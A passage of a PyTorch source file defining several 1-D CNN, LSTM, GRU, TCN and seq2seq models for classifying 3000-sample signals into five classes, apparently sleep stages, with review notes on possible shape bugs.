        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    def forward(self, x, h_init, c_init):
        """CNN feature extraction, then one LSTM step over the batch axis
        (the batch is unsqueezed into the sequence dimension)."""
        # print(x.shape)
        # CL1: 1 x 3'000 --> 64 x 3'000
        x = self.conv1(x)
        x = F.relu(x)
        # print(x.shape)
        # MP1: 64 x 3'000 --> 64 x 1'500
        x = self.pool1(x)
        # print(x.shape)
        x = self.dropout1(x)
        # CL2: 64 x 1'500 --> 64 x 1'500
        x = self.conv2(x)
        x = F.relu(x)
        # print(x.shape)
        # MP2: 64 x 1'500 --> 64 x 750
        x = self.pool2(x)
        # print(x.shape)
        # CL3: 64 x 750 --> 64 x 750
        x = self.conv3(x)
        x = F.relu(x)
        # print(x.shape)
        x = self.dropout1(x)
        # MP3: 64 x 376 = 24'064
        x = self.pool3(x)
        # print(x.shape)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # print(x.shape) # 24'064
        x = self.linear1(x)
        x = F.relu(x)
        # Droput
        x = self.dropout1(x)
        cnn_x = F.relu(x)
        # print('cnn_x', cnn_x.shape)
        # LSTM: treat the batch as a sequence of length `batch` with batch size 1.
        g_seq = cnn_x.unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout1(lstm_out)
        # linear
        cnn_lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        # output
        scores = cnn_lstm_out
        return scores, h_final, c_final
class ConvLSTM00(nn.Module):
    """Two-branch 1-D CNN (small-kernel "time" branch and large-kernel
    "frequency" branch) whose concatenated features feed an (optionally
    bidirectional) LSTM classifier.

    forward() returns (scores, h_final, c_final).
    """

    def __init__(self, bi_dir):
        super(ConvLSTM00, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir
        # Time branch: small kernel (50), captures fine temporal detail.
        self.conv1 = nn.Conv1d(1, 64, kernel_size=50, padding=1, stride=6)
        self.pool1 = nn.MaxPool1d(1, stride=8)
        self.dropout1 = nn.Dropout(0.5)
        self.conv2 = nn.Conv1d(64, 128, kernel_size=8, padding=1, stride=1)
        self.conv3 = nn.Conv1d(128, 128, kernel_size=8, padding=1, stride=1)
        self.conv4 = nn.Conv1d(128, 128, kernel_size=8, padding=1, stride=1)
        self.pool2 = nn.MaxPool1d(1, stride=4)
        # Frequency branch: large kernel (400), captures coarse structure.
        self.conv1_2 = nn.Conv1d(1, 64, kernel_size=400, padding=1, stride=50)
        self.pool1_2 = nn.MaxPool1d(1, stride=4)
        self.dropout1_2 = nn.Dropout(0.5)
        self.conv2_2 = nn.Conv1d(64, 128, kernel_size=6, padding=1, stride=1)
        self.conv3_2 = nn.Conv1d(128, 128, kernel_size=6, padding=1, stride=1)
        self.conv4_2 = nn.Conv1d(128, 128, kernel_size=6, padding=1, stride=1)
        self.pool2_2 = nn.MaxPool1d(1, stride=2)
        self.linear1 = nn.Linear(1920, 128)
        # self.dropout1 = nn.Dropout(0.4)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM
        self.lstm_in_dim = 1920
        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    def forward(self, x, h_init, c_init):
        """Run both CNN branches, concatenate along the sample axis, then
        one LSTM step over the batch axis."""
        # Time branch.
        out_time = self.conv1(x)
        out_time = F.relu(out_time)
        out_time = self.pool1(out_time)
        out_time = self.dropout1(out_time)
        out_time = self.conv2(out_time)
        out_time = F.relu(out_time)
        out_time = self.conv3(out_time)
        out_time = F.relu(out_time)
        out_time = self.conv4(out_time)
        out_time = F.relu(out_time)
        out_time = self.pool2(out_time)
        # Frequency branch.
        out_freq = self.conv1_2(x)
        out_freq = F.relu(out_freq)
        out_freq = self.pool1_2(out_freq)
        out_freq = self.dropout1_2(out_freq)
        out_freq = self.conv2_2(out_freq)
        out_freq = F.relu(out_freq)
        out_freq = self.conv3_2(out_freq)
        out_freq = F.relu(out_freq)
        out_freq = self.conv4_2(out_freq)
        out_freq = F.relu(out_freq)
        out_freq = self.pool2_2(out_freq)
        # Concatenate the two branches along the sample dimension.
        x = torch.cat((out_time, out_freq), 2)
        x = self.dropout1(x)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # print(x.shape) # 24'064
        # x = self.linear1(x)
        # x = F.relu(x)
        #
        # # Droput
        # x = self.dropout1(x)
        cnn_x = F.relu(x)
        # print('cnn_x', cnn_x.shape)
        # LSTM: treat the batch as a sequence of length `batch` with batch size 1.
        g_seq = cnn_x.unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout2(lstm_out)
        # linear
        cnn_lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        # output
        scores = cnn_lstm_out
        return scores, h_final, c_final
class Seq2Seq11(nn.Module):
    """LSTM-only classifier: the raw flattened signal (3000 values) is fed
    directly to an LSTM, followed by a linear head.

    NOTE(review): forward() passes the flattened 2-D tensor to the LSTM
    without unsqueezing, so the LSTM sees it as an unbatched sequence —
    h_init/c_init must be shaped accordingly; verify against the caller.
    """

    def __init__(self):
        super(Seq2Seq11, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        # self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=2)
        # self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=2)
        # self.pool1 = nn.MaxPool1d(2, stride=4)
        #
        # self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        # self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        # self.pool2 = nn.MaxPool1d(2, stride=2)
        #
        # # self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        # # self.pool3 = nn.MaxPool1d(2, stride=1)
        #
        # self.linear1 = nn.Linear(576, 128)
        self.dropout1 = nn.Dropout(0.4)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM over the raw 3000-sample input.
        self.lstm_in_dim = 3000
        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim, self.n_classes)

    def forward(self, x, h_init, c_init):
        """Flatten x, run the LSTM with the given state, project to scores."""
        # x = self.conv1(x)
        # x = F.relu(x)
        # x = self.conv2(x)
        # x = F.relu(x)
        # x = self.pool1(x)
        # x = self.dropout1(x)
        #
        # x = self.conv3(x)
        # x = F.relu(x)
        # x = self.conv4(x)
        # x = F.relu(x)
        # x = self.pool2(x)
        # x = self.dropout1(x)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # print(x.shape) # 24'064
        # x = self.linear1(x)
        # x = F.relu(x)
        #
        # # Droput
        # x = self.dropout1(x)
        # cnn_x = F.relu(x)
        # print('cnn_x', cnn_x.shape)
        # LSTM
        g_seq = x  # .unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout1(lstm_out)
        # linear
        lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        lstm_out = self.dropout1(lstm_out)
        # output
        scores = lstm_out
        return scores, h_final, c_final
class MyLSTM(nn.Module):
    """Linear projection (3000 -> 256) followed by an (optionally
    bidirectional) LSTM and a linear classification head.

    forward() returns (scores, h_final, c_final).
    """

    def __init__(self, bi_dir):
        super(MyLSTM, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir
        self.linear1 = nn.Linear(3000, 256)
        self.dropout1 = nn.Dropout(0.4)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM
        self.lstm_in_dim = 256
        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    def forward(self, x, h_init, c_init):
        """Project, then one LSTM step over the batch axis (batch unsqueezed
        into the sequence dimension)."""
        x = self.linear1(x)
        x = F.relu(x)
        # x = self.dropout1(x)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # LSTM
        g_seq = x.unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout1(lstm_out)
        # linear
        lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        lstm_out = self.dropout1(lstm_out)
        # output
        scores = lstm_out
        return scores, h_final, c_final
class MLP(nn.Module):
    """Two-layer perceptron baseline: 3000 inputs -> 256 hidden (ReLU) ->
    5 class scores. Both linear layers are bias-free."""

    def __init__(self):
        super(MLP, self).__init__()
        self.n_classes = 5
        self.layer1 = nn.Linear(3000, 256, bias=False)
        self.layer2 = nn.Linear(256, self.n_classes, bias=False)

    def forward(self, x):
        # Flatten (batch, channels, samples) into (batch, features).
        flat = x.reshape(x.size(0), x.size(1) * x.size(2))
        hidden = F.relu(self.layer1(flat))
        return self.layer2(hidden)
class ConvGRU(nn.Module):
    """Two-stage 1-D CNN feature extractor followed by an (optionally
    bidirectional) GRU classifier.

    forward() expects x of shape (batch, 1, 3000) plus the previous GRU
    hidden state, and returns (scores, new_hidden).  The CNN features for
    the whole batch are fed to the GRU as a sequence of length `batch`
    with a single "batch" entry (see forward()).
    """

    def __init__(self, bi_dir):
        super(ConvGRU, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir  # True -> bidirectional GRU, doubled head width
        self.rnn_type = 'gru'
        self.num_layers = 1
        # Stage 1: strided convs + pool.
        self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
        self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
        self.pool1 = nn.MaxPool1d(2, stride=6)
        # Stage 2.
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        self.pool2 = nn.MaxPool1d(2, stride=2)
        # 64 channels x 27 samples after the conv/pool stack for a
        # 3000-sample input -> 1728 flattened features.
        self.linear1 = nn.Linear(1728, 128)
        self.dropout1 = nn.Dropout(0.4)
        self.dropout2 = nn.Dropout(0.7)
        # GRU over the 128-d CNN features.
        self.lstm_in_dim = 128
        self.gru = nn.GRU(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # Linear head; input width doubles when bidirectional.
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    def init_hidden(self, batch_size):
        """Return a zeroed initial hidden state for the recurrent layer.

        BUG FIX: the first dimension must be num_layers * num_directions;
        the old GRU branch omitted the direction factor, which made the GRU
        raise a shape error whenever bi_dir=True.  The GRU's batch dimension
        is fixed at 1 because forward() unsqueezes the CNN features to
        shape (seq=batch, batch=1, 128).
        """
        if self.rnn_type == 'gru':
            return torch.zeros(self.num_layers * (1 + int(self.bi_dir)), 1, self.hidden_dim)
        elif self.rnn_type == 'lstm':
            return (
                torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim),
                torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim))

    def forward(self, x, gru_hidden):
        """CNN feature extraction, then one GRU step over the batch axis."""
        # Stage 1.
        x = self.conv1(x)
        x = F.relu(x)
        x = self.conv2(x)
        x = F.relu(x)
        x = self.pool1(x)
        x = self.dropout1(x)
        # Stage 2.
        x = self.conv3(x)
        x = F.relu(x)
        x = self.conv4(x)
        x = F.relu(x)
        x = self.pool2(x)
        x = self.dropout1(x)
        # Flatten and project to the 128-d GRU input space.
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        x = self.linear1(x)
        x = F.relu(x)
        # Dropout, then a second (idempotent) ReLU as in the original.
        x = self.dropout1(x)
        cnn_x = F.relu(x)
        # GRU: treat the batch as a sequence of length `batch`, batch size 1.
        g_seq = cnn_x.unsqueeze(dim=1)
        lstm_out, gru_hidden = self.gru(g_seq, gru_hidden)
        # Dropout
        lstm_out = self.dropout2(lstm_out)
        # Linear head (activations are implicit in the loss).
        cnn_lstm_out = self.hidden2label1(lstm_out)
        scores = cnn_lstm_out
        return scores, gru_hidden
class ConvLSTM(nn.Module):
    """Two-stage 1-D CNN feature extractor followed by an (optionally
    bidirectional) LSTM classifier.  Same CNN trunk as ConvGRU.

    forward() returns (scores, h_final, c_final).
    """

    def __init__(self, bi_dir):
        super(ConvLSTM, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir
        self.num_layers = 1
        self.rnn_type = 'lstm'
        self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
        self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
        self.pool1 = nn.MaxPool1d(2, stride=6)
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        self.pool2 = nn.MaxPool1d(2, stride=2)
        # self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        # self.pool3 = nn.MaxPool1d(2, stride=1)
        self.linear1 = nn.Linear(1728, 128)
        self.dropout1 = nn.Dropout(0.4)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM
        self.lstm_in_dim = 128
        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    # def init_hidden(self, batch_size):
    #     if self.rnn_type == 'gru':
    #         return torch.zeros(self.num_layers, batch_size, self.hidden_dim)
    #     elif self.rnn_type == 'lstm':
    #         return (
    #             torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim),
    #             torch.zeros(self.num_layers * (1 + int(self.bi_dir)), batch_size, self.hidden_dim))

    def forward(self, x, h_init, c_init):
        """CNN feature extraction, then one LSTM step over the batch axis."""
        x = self.conv1(x)
        x = F.relu(x)
        x = self.conv2(x)
        x = F.relu(x)
        x = self.pool1(x)
        x = self.dropout1(x)
        x = self.conv3(x)
        x = F.relu(x)
        x = self.conv4(x)
        x = F.relu(x)
        x = self.pool2(x)
        x = self.dropout1(x)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # print(x.shape) # 24'064
        x = self.linear1(x)
        x = F.relu(x)
        # Droput
        x = self.dropout1(x)
        cnn_x = F.relu(x)
        # print('cnn_x', cnn_x.shape)
        # LSTM: treat the batch as a sequence of length `batch` with batch size 1.
        g_seq = cnn_x.unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout2(lstm_out)
        # linear
        cnn_lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        # output
        scores = cnn_lstm_out
        return scores, h_final, c_final
        # LL2: 128 --> classes
        # x = self.linear2(x)
        # return x
class ConvLSTMOld(nn.Module):
    """Earlier CNN+LSTM variant: unstrided convs with plain max-pools
    (larger 24'064-d flattened features) before the LSTM classifier.

    forward() returns (scores, h_final, c_final).
    """

    def __init__(self, bi_dir):
        super(ConvLSTMOld, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir
        # CL1: 28 x 28 --> 64 x 3'000
        self.conv1 = nn.Conv1d(1, 16, kernel_size=3, padding=1)
        # MP1: 64 x 3'000 --> 64 x 1'500
        self.pool1 = nn.MaxPool1d(2)
        # CL2: 64 x 1'500 --> 64 x 1'500
        self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
        # MP2: 64 x 1'500 --> 64 x 750
        self.pool2 = nn.MaxPool1d(2)
        # CL3: 64 x 750 --> 64 x 750
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.to_pad = 1
        # MP3: 64 x 750 --> 64 x 375
        self.pool3 = nn.MaxPool1d(2, padding=self.to_pad)
        self.linear1 = nn.Linear(24064, 128)
        self.dropout1 = nn.Dropout(0.5)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM
        self.lstm_in_dim = 128
        self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
        # linear
        self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)

    def forward(self, x, h_init, c_init):
        """CNN feature extraction, then one LSTM step over the batch axis."""
        # print(x.shape)
        # CL1: 1 x 3'000 --> 64 x 3'000
        x = self.conv1(x)
        x = F.relu(x)
        # print(x.shape)
        # MP1: 64 x 3'000 --> 64 x 1'500
        x = self.pool1(x)
        # print(x.shape)
        x = self.dropout1(x)
        # CL2: 64 x 1'500 --> 64 x 1'500
        x = self.conv2(x)
        x = F.relu(x)
        # print(x.shape)
        # MP2: 64 x 1'500 --> 64 x 750
        x = self.pool2(x)
        # print(x.shape)
        # CL3: 64 x 750 --> 64 x 750
        x = self.conv3(x)
        x = F.relu(x)
        # print(x.shape)
        x = self.dropout1(x)
        # MP3: 64 x 376 = 24'064
        x = self.pool3(x)
        # print(x.shape)
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        # print(x.shape) # 24'064
        x = self.linear1(x)
        x = F.relu(x)
        # Droput
        x = self.dropout1(x)
        cnn_x = F.relu(x)
        # print('cnn_x', cnn_x.shape)
        # LSTM: treat the batch as a sequence of length `batch` with batch size 1.
        g_seq = cnn_x.unsqueeze(dim=1)
        # print('g_seq', g_seq.shape)
        lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
        # Droput
        lstm_out = self.dropout1(lstm_out)
        # linear
        cnn_lstm_out = self.hidden2label1(lstm_out)  # activations are implicit
        # output
        scores = cnn_lstm_out
        return scores, h_final, c_final
class ConvSimple33(nn.Module):
    """1-D CNN classifier (5 classes): three conv/pool stages + MLP head.

    Expects (batch, 1, length) input whose conv trunk flattens to 6016
    features (64 channels times the remaining temporal length).
    """

    def __init__(self):
        super(ConvSimple33, self).__init__()
        self.n_classes = 5
        # Stage 1: 1 -> 16 channels; stride-2 conv, then stride-4 max pool.
        self.conv1 = nn.Conv1d(1, 16, kernel_size=10, padding=1, stride=2)
        self.pool1 = nn.MaxPool1d(2, stride=4)
        # Stage 2: 16 -> 32 channels.
        self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
        self.pool2 = nn.MaxPool1d(2)
        # Stage 3: 32 -> 64 channels; the pool pads by one sample.
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.pool3 = nn.MaxPool1d(2, padding=1)
        # Classifier head.
        self.linear1 = nn.Linear(6016, 128)
        self.dropout1 = nn.Dropout(0.5)
        self.linear2 = nn.Linear(128, self.n_classes)

    def forward(self, x):
        """Return raw class logits for a (batch, 1, length) input."""
        out = self.dropout1(self.pool1(F.relu(self.conv1(x))))
        out = self.pool2(F.relu(self.conv2(out)))
        out = self.pool3(self.dropout1(F.relu(self.conv3(out))))
        # Flatten (batch, channels, length) -> (batch, channels * length).
        out = out.reshape(out.size(0), out.size(1) * out.size(2))
        out = self.dropout1(F.relu(self.linear1(out)))
        return self.linear2(out)
class ConvSimpleSOTA(nn.Module):
    """1-D CNN classifier (5 classes): three conv-conv-pool stages + head.

    Expects (batch, 1, 3000)-shaped input; the trunk flattens to 3328
    features (256 channels times the remaining temporal length).
    """

    def __init__(self):
        super(ConvSimpleSOTA, self).__init__()
        self.n_classes = 5
        # Stage 1: 1 -> 32 channels, two stride-3 convs, stride-6 avg pool.
        self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
        self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
        self.pool1 = nn.AvgPool1d(2, stride=6)
        # Stage 2: 32 -> 64 channels.
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        self.pool2 = nn.AvgPool1d(2, stride=2)
        # Stage 3: 64 -> 256 channels.
        self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
        self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
        self.pool_avg = nn.AvgPool1d(2)
        # Classifier head.
        self.linear1 = nn.Linear(3328, 128)
        self.dropout1 = nn.Dropout(0.2)
        self.linear2 = nn.Linear(128, self.n_classes)

    def forward(self, x):
        """Return raw class logits for a (batch, 1, 3000) input."""
        out = x
        # Each stage: conv -> relu -> conv -> relu -> pool -> dropout.
        for first, second, pool in (
            (self.conv1, self.conv2, self.pool1),
            (self.conv3, self.conv4, self.pool2),
            (self.conv5, self.conv6, self.pool_avg),
        ):
            out = F.relu(first(out))
            out = F.relu(second(out))
            out = self.dropout1(pool(out))
        out = out.reshape(out.size(0), -1)
        out = self.dropout1(F.relu(self.linear1(out)))
        return self.linear2(out)
class ConvSimpleBest(nn.Module):
    """1-D CNN classifier (5 classes): three conv-conv-pool stages with
    batch normalisation, then a small MLP head.

    Same trunk as ConvSimpleSOTA plus BatchNorm and a much lighter dropout
    (p=0.02) applied only before the classifier.
    """

    def __init__(self):
        super(ConvSimpleBest, self).__init__()
        self.n_classes = 5
        # Stage 1: 1 -> 32 channels, two stride-3 convs, stride-6 avg pool.
        self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
        self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
        self.pool1 = nn.AvgPool1d(2, stride=6)
        # NOTE(review): each bn layer below is applied after *two* different
        # convs in forward(), so both applications share affine weights and
        # running statistics -- confirm this sharing is intentional.
        self.bn1 = nn.BatchNorm1d(num_features=32)
        # Stage 2: 32 -> 64 channels.
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        self.pool2 = nn.AvgPool1d(2, stride=2)
        self.bn2 = nn.BatchNorm1d(num_features=64)
        # Stage 3: 64 -> 256 channels.
        self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
        self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
        self.pool_avg = nn.AvgPool1d(2)
        self.bn3 = nn.BatchNorm1d(num_features=256)
        # Head: 3328 = 256 channels * remaining temporal length.
        self.linear1 = nn.Linear(3328, 128)
        self.dropout1 = nn.Dropout(0.02)
        # LL2: 128 --> classes
        self.linear2 = nn.Linear(128, self.n_classes)

    def forward(self, x):
        """Return raw class logits for a (batch, 1, 3000) input."""
        # Stage 1: conv -> bn -> relu, twice, then pool.
        x = self.conv1(x)
        x = self.bn1(x)
        x = F.relu(x)
        x = self.conv2(x)
        x = self.bn1(x)
        x = F.relu(x)
        x = self.pool1(x)
        # Stage 2 (dropout in the conv trunk is intentionally disabled).
        x = self.conv3(x)
        x = self.bn2(x)
        x = F.relu(x)
        x = self.conv4(x)
        x = self.bn2(x)
        x = F.relu(x)
        x = self.pool2(x)
        # Stage 3.
        x = self.conv5(x)
        x = self.bn3(x)
        x = F.relu(x)
        x = self.conv6(x)
        x = self.bn3(x)
        x = F.relu(x)
        x = self.pool_avg(x)
        # Flatten and classify.
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        x = self.linear1(x)
        x = F.relu(x)
        x = self.dropout1(x)
        x = self.linear2(x)
        return x
class TCN00(nn.Module):
    """Temporal Convolutional Network wrapper: TCN trunk + linear readout.

    Four 16-channel temporal blocks with kernel size 10 and dropout 0.2,
    followed by a per-timestep linear layer to 5 outputs.
    """

    def __init__(self):
        super(TCN00, self).__init__()
        input_size = 1
        output_size = 5
        num_channels = [16] * 4
        kernel_size = 10
        dropout = 0.2
        self.tcn = TemporalConvNet(input_size, num_channels, kernel_size, dropout=dropout)
        self.linear = nn.Linear(num_channels[-1], output_size)
        # Kept for interface/state-dict parity; not applied in forward().
        self.sig = nn.Sigmoid()

    def forward(self, x):
        """x: (N, C, L). Returns per-timestep scores (N, L, 5) as double."""
        features = self.tcn(x).transpose(1, 2)
        return self.linear(features).double()
class TempConv(nn.Module):
    """ConvSimpleSOTA-shaped trunk built from TemporalConvNet blocks.

    NOTE(review): TemporalConvNet is called here as
    (in_ch, out_ch, kernel_size=...), but TCN00 above calls it as
    (input_size, num_channels_list, kernel_size, dropout=...) and indexes
    num_channels[-1]; one of the two usages is likely wrong -- confirm the
    TemporalConvNet signature.
    """

    def __init__(self):
        super(TempConv, self).__init__()
        self.n_classes = 5
        # Stage 1.
        self.conv1 = TemporalConvNet(1, 32, kernel_size=10)
        self.conv2 = TemporalConvNet(32, 32, kernel_size=10)
        self.pool1 = nn.AvgPool1d(2, stride=6)
        # Stage 2.
        self.conv3 = TemporalConvNet(32, 64, kernel_size=3)
        self.conv4 = TemporalConvNet(64, 64, kernel_size=3)
        self.pool2 = nn.AvgPool1d(2, stride=2)
        # Stage 3.
        self.conv5 = TemporalConvNet(64, 256, kernel_size=3)
        self.conv6 = TemporalConvNet(256, 256, kernel_size=3)
        self.pool_avg = nn.AvgPool1d(2)
        # Head: 3328 flattened features -> 128 -> classes.
        self.linear1 = nn.Linear(3328, 128)
        self.dropout1 = nn.Dropout(0.02)
        self.linear2 = nn.Linear(128, self.n_classes)

    def forward(self, x):
        """Return raw class logits for a (batch, 1, length) input."""
        # Stage 1: block -> relu -> block -> relu -> pool.
        x = self.conv1(x)
        x = F.relu(x)
        x = self.conv2(x)
        x = F.relu(x)
        x = self.pool1(x)
        # Stage 2 (dropout in the trunk intentionally disabled).
        x = self.conv3(x)
        x = F.relu(x)
        x = self.conv4(x)
        x = F.relu(x)
        x = self.pool2(x)
        # Stage 3.
        x = self.conv5(x)
        x = F.relu(x)
        x = self.conv6(x)
        x = F.relu(x)
        x = self.pool_avg(x)
        # Flatten and classify.
        x = x.reshape(x.size(0), x.size(1) * x.size(2))
        x = self.linear1(x)
        x = F.relu(x)
        x = self.dropout1(x)
        x = self.linear2(x)
        return x
class Encoder(nn.Module):
    """Single-layer LSTM encoder over 3000-dimensional input frames.

    forward() returns only the final (hidden, cell) pair, which seeds the
    decoder in a seq2seq setup.
    """

    def __init__(self):
        super().__init__()
        self.input_dim = 3000
        self.hid_dim = 64
        self.n_layers = 1
        self.dropout = 0.3
        self.rnn = nn.LSTM(self.input_dim, self.hid_dim, self.n_layers, dropout=self.dropout)
        # NOTE: rebinds self.dropout from the float rate to a module,
        # mirroring the original attribute layout.
        self.dropout = nn.Dropout(self.dropout)

    def forward(self, src):
        """Encode src (seq, batch, input_dim) -> (hidden, cell).

        Both returned states have shape (n_layers * n_dirs, batch, hid_dim);
        the per-step outputs are discarded.
        """
        _, (hidden, cell) = self.rnn(src)
        return hidden, cell
class Decoder(nn.Module):
    """Single-step LSTM decoder producing 5-dimensional predictions."""

    def __init__(self):
        super().__init__()
        self.output_dim = 5
        self.hid_dim = 64
        self.n_layers = 1
        self.dropout = 0.5
        self.rnn = nn.LSTM(self.output_dim, self.hid_dim, self.n_layers, dropout=self.dropout)
        self.out = nn.Linear(self.hid_dim, self.output_dim)
        # NOTE: rebinds self.dropout from the float rate to a module,
        # mirroring the original attribute layout.
        self.dropout = nn.Dropout(self.dropout)

    def forward(self, input, hidden, cell):
        """One decoding step.

        :param input: (batch, output_dim) previous token/prediction.
        :param hidden: (n_layers, batch, hid_dim) hidden state.
        :param cell: (n_layers, batch, hid_dim) cell state.
        :return: (prediction (batch, output_dim), hidden, cell).
        """
        step = input.unsqueeze(0)  # add a length-1 time axis: (1, batch, output_dim)
        output, (hidden, cell) = self.rnn(step, (hidden, cell))
        # Drop the time axis before the readout layer.
        prediction = self.out(output.squeeze(0))
        return prediction, hidden, cell
class Seq2Seq(nn.Module):
    """Wire an encoder and a step-wise decoder together with teacher forcing.

    The encoder must expose hid_dim/n_layers and return (hidden, cell);
    the decoder must expose hid_dim/n_layers/output_dim and map
    (input, hidden, cell) -> (prediction, hidden, cell).
    """

    def __init__(self, encoder, decoder, device):
        super().__init__()
        self.encoder = encoder
        self.decoder = decoder
        self.device = device
        # Fail fast on incompatible encoder/decoder geometry.
        assert encoder.hid_dim == decoder.hid_dim, \
            "Hidden dimensions of encoder and decoder must be equal!"
        assert encoder.n_layers == decoder.n_layers, \
            "Encoder and decoder must have equal number of layers!"

    def forward(self, src, trg, teacher_forcing_ratio=0.5):
        """Decode trg.shape[0]-1 steps; outputs[0] stays all-zero.

        :param src: encoder input, (src_len, batch, ...).
        :param trg: target sequence, (trg_len, batch, ...); trg[0] is the
            first decoder input (<sos> row).
        :param teacher_forcing_ratio: probability of feeding the ground
            truth (rather than the model's argmax) at each step.
        """
        max_len, batch_size = trg.shape[0], trg.shape[1]
        trg_vocab_size = self.decoder.output_dim
        outputs = torch.zeros(max_len, batch_size, trg_vocab_size).to(self.device)
        # The encoder's final states seed the decoder.
        hidden, cell = self.encoder(src)
        step_input = trg[0, :]
